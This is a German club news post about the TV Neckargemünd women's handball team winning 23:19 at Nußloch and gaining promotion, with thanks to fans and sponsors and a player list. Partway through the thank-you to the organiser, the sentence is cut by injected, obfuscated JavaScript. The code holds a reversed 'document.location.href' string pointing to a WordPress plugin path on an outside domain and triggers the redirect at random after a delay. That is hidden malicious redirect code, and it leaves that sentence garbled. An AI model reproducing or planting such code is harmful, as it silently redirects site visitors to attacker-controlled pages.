Damen: Aufstieg in die 1. Kreisliga

Am Samstag, dem 18.04.15 hieß es noch einmal alles geben. Mit einer großen Fangemeinde, u.a. auch mit den Fußballern der SpVgg Neckargemünd, fuhr man mit einem Reisebus der Firma Mayer zum letzten Saisonspiel nach Nußloch. (Bildergalerie folgt)
Neckargemünd, 19.04.15 (kkn) – Auch die motivierenden Worte von Trainer T.Uremovic “ geht da raus und habt Spaß“, konnten den Damen des TVN die Nervosität nicht nehmen. Der Druck lastete stark auf den Spielerinnen, man musste mindestens ein Unentschieden erspielen um aufsteigen zu können. Allerdings war es allen bewusst, dass es ein harter Kampf um die 2 Punkte geben wird.

Das ganze Spiel über vergab man Torchancen und verschenkte die Bälle, individuelle Abwehrfehler führten zu leichten Toren des Gegners. So stand es in der Halbzeit 10:12.

Immer wenn die Gegner wieder ran kamen, erkämpfte sich das Team Tor um Tor und eine starke S.Mulawa im Tor legte einige Paraden hin. So gewann man das Spiel verdient mit 19:23.

Auch diesmal pfiff das Spiel wieder ein guter Schiedsrichter, der das Verhalten der Nußlocher mit einer roten Karte gleich am Anfang des Spiels und fünf Zeitstrafen bestrafte.

Vielen Dank an die Fans die uns so lautstark unterstützt haben!

Ein großes Dankeschön gilt unseren Sponsoren Getränke Ziegler, Physiotherapie Schuster und Peter Sahm!

Danke auch an den Organisatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor des gestrigen Tages Christian Pabst, der diesen zu etwas Besonderem und Unvergesslichen gemacht hat!

Es spielten :
Im Tor: S.Mulawa, K.Höfer
Im Feld: C.Koch 6, L.Maier 6, L.Bucher 5, K.Knauf 4, S.Pabst 2, L.Capriglione, J.Lehr, E.Weitzel, S.Drescher, C.Gerstner, K.Ebert, M.Klingenberg